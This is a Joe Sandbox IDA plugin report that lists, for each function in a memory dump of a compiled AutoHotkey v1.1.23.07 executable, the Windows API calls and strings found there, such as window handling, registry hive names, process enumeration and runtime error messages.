Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004448A0, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 239

APIs

_strncpy.LIBCMT ref: 004448FC

Strings

Str, xrefs: 00444959
Ptr, xrefs: 00444973
AStr, xrefs: 00444A0F
Float, xrefs: 004449DB
Double, xrefs: 004449F5
Int, xrefs: 0044493F
Short, xrefs: 0044498D
Char, xrefs: 004449A7
WStr, xrefs: 00444A29
*pP, xrefs: 00444916
Int64, xrefs: 004449C1

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00413770, Relevance: 21.2, APIs: 2, Strings: 10, Instructions: 206registry

APIs

_strncpy.LIBCMT ref: 00413989
RegConnectRegistryA.ADVAPI32(?), ref: 004139AB

Strings

HKEY_USERS, xrefs: 0041393B
HKLM, xrefs: 00413861
HKCU, xrefs: 004138F9
HKEY_CURRENT_USER, xrefs: 0041390F
HKEY_CLASSES_ROOT, xrefs: 004138AF
HKEY_LOCAL_MACHINE, xrefs: 0041387B
HKCC, xrefs: 004138C9
HKEY_CURRENT_CONFIG, xrefs: 004138E3
HKU, xrefs: 00413925
HKCR, xrefs: 00413895

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045F026, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 93windowlibrary

APIs

Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C

SelectObject.GDI32(?,?), ref: 0045E6AA
ReleaseDC.USER32(?,?), ref: 0045E6B5
LoadLibraryA.KERNEL32(atl), ref: 0045F033
GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0045F045
FreeLibrary.KERNEL32(00000000), ref: 0045F064
CreateWindowExA.USER32(?,AtlAxWin,?,?,?,?,?,?,?,?,00400000,00000000), ref: 0045F0AF
InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F

Part of subcall function 00455BD0: GetModuleHandleA.KERNEL32(atl), ref: 00455BE2
Part of subcall function 00455BD0: GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00455BF2

DestroyWindow.USER32 ref: 0045F0D1
SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
GetClientRect.USER32(?,?), ref: 0045F2EF
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
GetWindowRect.USER32(?,?), ref: 0045F38E
SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
GetWindowRect.USER32(?,?), ref: 0045F40B
MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E
SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C

Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511

Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22

SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462

Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880

Strings

Can't create control., xrefs: 0045E6CA
AtlAxWin, xrefs: 0045F0A9
AtlAxWinInit, xrefs: 0045F03F
atl, xrefs: 0045F02E

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004350F0, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 197

APIs

GetCurrentProcessId.KERNEL32 ref: 00435149

Part of subcall function 00452810: GetModuleHandleA.KERNEL32(kernel32,CreateToolhelp32Snapshot,?,?,?,00000000), ref: 00452840
Part of subcall function 00452810: GetProcAddress.KERNEL32(00000000,?,?,?,00000000), ref: 00452843
Part of subcall function 00452810: GetModuleHandleA.KERNEL32(kernel32,Process32First,?,?,?,00000000), ref: 00452867
Part of subcall function 00452810: GetProcAddress.KERNEL32(00000000,?,?,?,00000000), ref: 0045286A
Part of subcall function 00452810: GetModuleHandleA.KERNEL32(kernel32,Process32Next,?,?,?,00000000), ref: 0045288E
Part of subcall function 00452810: GetProcAddress.KERNEL32(00000000,?,?,?,00000000), ref: 00452891
Part of subcall function 00452810: __wsplitpath.LIBCMT ref: 00452949
Part of subcall function 00452810: CloseHandle.KERNEL32(00000000), ref: 004529BA
Part of subcall function 00452810: CloseHandle.KERNEL32(00000000), ref: 004529CE
Part of subcall function 00452810: CloseHandle.KERNEL32(00000000), ref: 004529E2

OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 00435186
TerminateProcess.KERNEL32(00000000,00000000), ref: 00435195
CloseHandle.KERNEL32(00000000), ref: 0043519E

Part of subcall function 00486FE5: __mbctoupper_l.LIBCMT ref: 00486FEF

GetCurrentProcessId.KERNEL32 ref: 00435244
OpenProcess.KERNEL32(00000200,00000000,00000000), ref: 0043525C
SetPriorityClass.KERNEL32(00000000,00008000), ref: 0043526E
GetTickCount.KERNEL32 ref: 004352B7
GetTickCount.KERNEL32 ref: 004352F8

Strings

Parameter #1 invalid., xrefs: 00435110

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0048938E, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 148file

APIs

GetModuleFileNameW.KERNEL32(00000000,004A8182,00000104,00000001,00000000,004011C4), ref: 0048942A

Part of subcall function 00489164: GetCurrentProcess.KERNEL32(C0000417,004719BE,004011C4), ref: 0048917A
Part of subcall function 00489164: TerminateProcess.KERNEL32(00000000), ref: 00489181

_wcslen.LIBCMT ref: 00489459
_wcslen.LIBCMT ref: 00489466

Part of subcall function 0048E204: LoadLibraryW.KERNEL32(USER32.DLL), ref: 0048E23F
Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0048E25B
Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0048E279
Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0048E289
Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0048E299
Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0048E2AD

GetStdHandle.KERNEL32(000000F4,00000001,00000000,004011C4), ref: 004894DC
_strlen.LIBCMT ref: 00489519
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00489528

Part of subcall function 0048B884: IsDebuggerPresent.KERNEL32 ref: 00490272
Part of subcall function 0048B884: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00490287
Part of subcall function 0048B884: UnhandledExceptionFilter.KERNEL32(004987AC), ref: 00490292
Part of subcall function 0048B884: GetCurrentProcess.KERNEL32(C0000409), ref: 004902AE
Part of subcall function 0048B884: TerminateProcess.KERNEL32(00000000), ref: 004902B5

Strings

Runtime Error!Program: , xrefs: 004893F8
<program name unknown>, xrefs: 00489439
..., xrefs: 0048947A
Microsoft Visual C++ Runtime Library, xrefs: 004894C0

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004667E0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110windowlibrary

APIs

LoadLibraryA.KERNEL32(uxtheme), ref: 0046680F
GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466821
FreeLibrary.KERNEL32(00000000,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466839
SendMessageA.USER32(?,00000406,?,?), ref: 00466891
SendMessageA.USER32(?,00000409,00000000,FF000000), ref: 004668AA
SendMessageA.USER32(?,00002001,00000000,?), ref: 004668C7

Part of subcall function 00466910: GetWindowRect.USER32(?,?), ref: 0046694A
Part of subcall function 00466910: GetWindowRect.USER32(?,?), ref: 00466954
Part of subcall function 00466910: IntersectRect.USER32(?,?,?), ref: 00466965

GetSysColor.USER32(0000000F), ref: 004668E2
SendMessageA.USER32(?,00002001,00000000,?), ref: 004668F8

Strings

SetWindowTheme, xrefs: 0046681B
uxtheme, xrefs: 0046680A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00462640, Relevance: 16.7, APIs: 11, Instructions: 216window

APIs

SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
GetWindowLongA.USER32(?,000000F0), ref: 004626AD
SendMessageA.USER32(?,?,00000000,?), ref: 00462736
SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
GetWindowLongA.USER32(?,000000F0), ref: 0046280A
SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004628B0, Relevance: 16.6, APIs: 11, Instructions: 136window

APIs

Part of subcall function 00472EC0: __Stoull.NTSTC_LIBCMT ref: 00472F17
Part of subcall function 00472EC0: __Stoull.NTSTC_LIBCMT ref: 00472F33
Part of subcall function 00472EC0: LoadLibraryA.KERNEL32(gdiplus), ref: 00473151
Part of subcall function 00472EC0: LoadImageA.USER32(00000000,?,?,?,?,00002010), ref: 004731AF
Part of subcall function 00472EC0: GetFileAttributesA.KERNEL32(?), ref: 004731D0
Part of subcall function 00472EC0: LoadLibraryA.KERNEL32(gdiplus), ref: 0047328C
Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 004732A4
Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 004732AE
Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromFile), ref: 004732BA
Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdipCreateHBITMAPFromBitmap), ref: 004732C4
Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 004732D0
Part of subcall function 00472EC0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00473317
Part of subcall function 00472EC0: FreeLibrary.KERNEL32(00000000), ref: 0047335D
Part of subcall function 00472EC0: GetIconInfo.USER32(?,?), ref: 0047338B
Part of subcall function 00472EC0: GetObjectA.GDI32(?,00000018,?), ref: 004733A5
Part of subcall function 00472EC0: DeleteObject.GDI32(?), ref: 004733F9
Part of subcall function 00472EC0: DeleteObject.GDI32(?), ref: 00473400
Part of subcall function 00472EC0: DestroyCursor.USER32(?), ref: 0047341D
Part of subcall function 00472EC0: LoadImageA.USER32(00000000,?,?,?,?,00000010), ref: 00473434
Part of subcall function 00472EC0: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00473455
Part of subcall function 00472EC0: GetFileSize.KERNEL32(00000000,00000000), ref: 00473469
Part of subcall function 00472EC0: GlobalAlloc.KERNEL32(00000002,00000000), ref: 00473476
Part of subcall function 00472EC0: CloseHandle.KERNEL32(00000000), ref: 00473483
Part of subcall function 00472EC0: GlobalFix.KERNEL32(00000000), ref: 00473497
Part of subcall function 00472EC0: CloseHandle.KERNEL32(00000000), ref: 004734A2
Part of subcall function 00472EC0: GlobalFree.KERNEL32(00000000), ref: 004734A9
Part of subcall function 00472EC0: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004734CA
Part of subcall function 00472EC0: GlobalUnWire.KERNEL32(00000000), ref: 004734D1
Part of subcall function 00472EC0: CloseHandle.KERNEL32(00000000), ref: 004734D8
Part of subcall function 00472EC0: CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 004734E6
Part of subcall function 00472EC0: OleLoadPicture.OLEAUT32(?,00000000,00000000,004967D0,00000000), ref: 00473507
Part of subcall function 00472EC0: GlobalFree.KERNEL32(00000000), ref: 00473526
Part of subcall function 00472EC0: DestroyCursor.USER32(?), ref: 0047359B
Part of subcall function 00472EC0: CopyImage.USER32(?,00000000,?,?,00000000), ref: 004735DE
Part of subcall function 00472EC0: CopyImage.USER32(?,?,?,?,0000000C), ref: 0047364C

SendMessageA.USER32(?,00000172,00000002,00000000), ref: 004628FE
DestroyCursor.USER32(00000000), ref: 00462901
SendMessageA.USER32(?,00000172,00000000,00000000), ref: 00462913
DeleteObject.GDI32(00000000), ref: 00462916
DestroyCursor.USER32(?), ref: 004629CC

Part of subcall function 00473980: GetIconInfo.USER32(?,?), ref: 00473991
Part of subcall function 00473980: GetObjectA.GDI32(?,00000018,?), ref: 004739B6
Part of subcall function 00473980: CreateCompatibleDC.GDI32(00000000), ref: 004739CC
Part of subcall function 00473980: CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00473A20
Part of subcall function 00473980: SelectObject.GDI32(00000000,00000000), ref: 00473A33
Part of subcall function 00473980: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00473A57
Part of subcall function 00473980: GdiFlush.GDI32 ref: 00473A5D
Part of subcall function 00473980: GetDIBits.GDI32(?,00000000,00000000,?,?,00000028,00000000), ref: 00473A9E
Part of subcall function 00473980: SelectObject.GDI32(?,?), ref: 00473AD5
Part of subcall function 00473980: SelectObject.GDI32(?,?), ref: 00473AF6
Part of subcall function 00473980: DeleteObject.GDI32(00000000), ref: 00473B02
Part of subcall function 00473980: GetLastError.KERNEL32(?,00000000), ref: 00473B0F
Part of subcall function 00473980: DeleteDC.GDI32(00000000), ref: 00473B16
Part of subcall function 00473980: DeleteObject.GDI32(?), ref: 00473B26
Part of subcall function 00473980: DeleteObject.GDI32(00000000), ref: 00473B2C
Part of subcall function 00473980: DestroyCursor.USER32(00000000), ref: 00473B38

DestroyCursor.USER32(?), ref: 00462950
GetWindowLongA.USER32(?,000000F0), ref: 00462960
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00462990
SendMessageA.USER32(?,00000172,?,?), ref: 004629A3
SendMessageA.USER32(00000000,00000173,?,00000000), ref: 004629B0
DeleteObject.GDI32(?), ref: 004629C4

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00439580, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 217

APIs

_strncpy.LIBCMT ref: 004395FD
_strncpy.LIBCMT ref: 0043961F
_strncpy.LIBCMT ref: 00439641
MulDiv.KERNEL32(80000000,00000060,00000060), ref: 004396FE
MulDiv.KERNEL32(?,00000060,00000060), ref: 00439733
DialogBoxParamA.USER32(00400000,000000CD,00000000,Function_000398A0,00000000), ref: 004397CB

Strings

AutoHotkey v1.1.23.07, xrefs: 004395ED, 004395F7
The InputBox window could not be displayed., xrefs: 0043985C
The maximum number of InputBoxes has been reached., xrefs: 004395B7

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0040C262, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 132

APIs

__itow.LIBCMT ref: 0040C2B0
__itow.LIBCMT ref: 0040C411
__itow.LIBCMT ref: 0040C43B
CharUpperA.USER32(?), ref: 0040C452

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

Strings

%i-%i, xrefs: 0040C3E6
joypoll, xrefs: 0040C331
2-hooks, xrefs: 0040C31B
%s%s%s%s%s%s, xrefs: 0040C491
(no), xrefs: 0040C469
m-hook, xrefs: 0040C2FA
k-hook, xrefs: 0040C2D9
OFF, xrefs: 0040C35F, 0040C48A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00466AE9, Relevance: 15.1, APIs: 10, Instructions: 138window

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00466B4D
ShowWindow.USER32(00000000,00000000), ref: 00466B80
EnableWindow.USER32(?,00000001), ref: 00466B94
EnableWindow.USER32(00000000,00000000), ref: 00466BA5
GetWindowRect.USER32(?,?), ref: 00466BB9
PtInRect.USER32(?,?,?), ref: 00466BD4
PtInRect.USER32(?,?,?), ref: 00466BE9
SetFocus.USER32(00000000), ref: 00466C2B
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00466C6F
SetFocus.USER32(00000000), ref: 00466C7C
InvalidateRect.USER32(?,00000000,00000001), ref: 00466C95
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00466CB1
InvalidateRect.USER32(?,?,00000001), ref: 00466CC2

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045E56A, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 119window

APIs

Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C

CreateWindowExA.USER32(?,edit,?,?,?,?,?,?,?,?,00400000,00000000), ref: 0045E601
SendMessageA.USER32(00000000,000000CC,?,00000000), ref: 0045E630
SendMessageA.USER32(?,000000C5,?,00000000), ref: 0045E65A
SendMessageA.USER32(?,000000CB,?,?), ref: 0045E679
SelectObject.GDI32(?,?), ref: 0045E6AA
ReleaseDC.USER32(?,?), ref: 0045E6B5
SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
GetClientRect.USER32(?,?), ref: 0045F2EF
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
GetWindowRect.USER32(?,?), ref: 0045F38E
SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
GetWindowRect.USER32(?,?), ref: 0045F40B
MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E
InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F
SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C

Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511

Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22

SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462

Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Strings

edit, xrefs: 0045E5FB
Can't create control., xrefs: 0045E6CA

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045C230, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 101windowregistry

APIs

LoadCursorA.USER32 ref: 0045C2A1
RegisterClassExA.USER32(00000000), ref: 0045C2C0

Part of subcall function 0045C460: _strncpy.LIBCMT ref: 0045C481

CreateWindowExA.USER32(?,AutoHotkeyGUI,001B2774,?,00000000,00000000,00000000,00000000,?,00000000,00400000,00000000), ref: 0045C331
SendMessageA.USER32(00000000,00000080,00000000,00000000), ref: 0045C371
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0045C37F

Strings

RegClass, xrefs: 0045C2DC
0, xrefs: 0045C275
AutoHotkeyGUI, xrefs: 0045C27D, 0045C32B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00454D50, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88window

APIs

FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
_vswprintf_s.LIBCMT ref: 00454E02
SysFreeString.OLEAUT32(?), ref: 00454E32
SysFreeString.OLEAUT32(00000000), ref: 00454E38
SysFreeString.OLEAUT32(?), ref: 00454E3E

Strings

No valid COM object!, xrefs: 00454D9C
